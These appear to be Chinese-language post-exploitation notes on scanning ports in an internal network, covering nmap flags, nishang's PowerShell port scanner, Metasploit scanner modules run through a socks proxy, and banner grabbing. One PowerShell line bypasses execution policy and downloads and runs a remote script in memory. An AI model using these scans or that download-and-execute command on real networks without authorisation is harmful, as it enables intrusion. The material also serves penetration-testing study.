1.利用Telnet探测端口
telent <IP> <Port>
2.nmap
nmap -p 端口号
参数 说明
-sT TCP连接扫描
-sS TCP SYN扫描(半开扫描), 需要root权限
-sF TCP FIN扫描
-sN TCP 空扫描
-sX TCP 圣诞树扫描
-sA TCP ACK扫描
-sU UDP 扫描, 结果不大可靠
-sP ping扫描,nmap端口扫描的时候默认就是使用ping扫描
只有主机存活, Nmap才会继续扫描
此外还有一些参数:
参数 说明
-sR RPC扫描
-sV 版本扫描
-b FTP代理扫描
-P0 扫描前不ping主机
-v 显示详细扫描过程
-p 指定扫描端口
-O 操作系统探测
-A 全面系统探测,启用脚本检测、扫描等
-sC 根据端口识别的服务,调用默认脚本
--script=脚本名称 使用脚本引擎, 有多种功能的脚本,如
漏洞扫描、漏洞利用、目录扫描等功能
3,powershell端口扫描
nishang
设置权限
Set-ExecutionPolicy RemoteSigned
加载模块
Import-Module .\nishang.psm1
获取模块
Get-Command -Module nishang
对某个网段的主机进行端口扫描
Invoke-PortScan -StartAddress 192.168.52.1 -EndAddress 192.168.52.138 -ResolveHost -ScanPort
远程加载扫指定端口
powershell.exe -exec bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.92.1/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 192.168.92.1 -EndAddress 192.168.92.30 -ResolveHost -ScanPort -Port 80,88,135,139,443,445,3306,3389,8080"
4.msf探测内网
MetaSploite的auxiliary/scanner中存放了许多后渗透扫描功能模块。
msf-NetBIOS扫描存活主机:
msf5 exploit(multi/handler) > use auxiliary/scanner/netbios/nbname
msf5 auxiliary(scanner/netbios/nbname) > set rhosts 192.168.52.0/24
msf5 auxiliary(scanner/netbios/nbname) > run
cs--socks代理--msf端口扫描:
1.
2.
端口扫描
use auxiliary/scanner/portscan/tcp
基本设置
show options
高级设置
show advanced
setg Proxies socks4:192.168.159.128:36428
5.端口Banner信息
端口中的Banner往往会泄露重要信息,比如得到软件开发商,软件型号,服务类型,版本号这些信息(主要是最后两个)
nc ip port
telnet ip port
nmap --script=banner -Pn 127.0.0.1/24
nmap -A -Pn 127.0.0.1/24